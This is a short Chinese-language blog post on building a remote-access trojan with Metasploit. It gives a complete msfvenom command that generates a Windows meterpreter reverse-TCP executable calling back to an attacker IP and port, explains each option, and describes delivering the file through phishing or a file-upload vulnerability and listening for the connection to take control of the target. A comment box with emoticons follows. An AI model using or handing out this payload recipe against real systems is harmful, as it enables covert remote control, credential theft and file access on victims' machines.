远控木马
本文最后更新于 184 天前,其中的信息可能已经有所发展或是发生改变。

一般由metasploit、cobaltstrike等c2文件控制器生成的系统可执行文件(exe apk elf macho) 本篇文章以Metasploit为例。

0x01

windows可执行程序后门木马生成 (msfvenom是metasploit提供的一个生成后门木马的程序):

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.234.137 lport=9999 -f exe -o test.exe

-p

就是攻击载荷,分为两个部分,如下。

windows/x64/meterpreter/reserve_tcp为第一个部分,这里写要攻击的操作系统与通过什么样的方式去攻击。例子中以meterpreter作为攻击载荷,操作系统是 windows/x64,/reserve_tcp就是将受害者机器以反连tcp的方式连接到我们的黑客服务器,给我们提供目标机器meterpreter shell的链接。整个过程即反弹shell的建立。meterpreter shell的功能很强大,包括但不限于添加一个用户、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe等

第二个部分为payload的设置,即黑客服务器的ip地址与端口

-f

即format,要生成的文件格式

-o

生成文件的文件名

生成之后,通过钓鱼或文件上传漏洞发送到目标机器,在黑客服务器上开启对应的端口监听,之后让木马运行,即可得到目标机器的控制权。

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇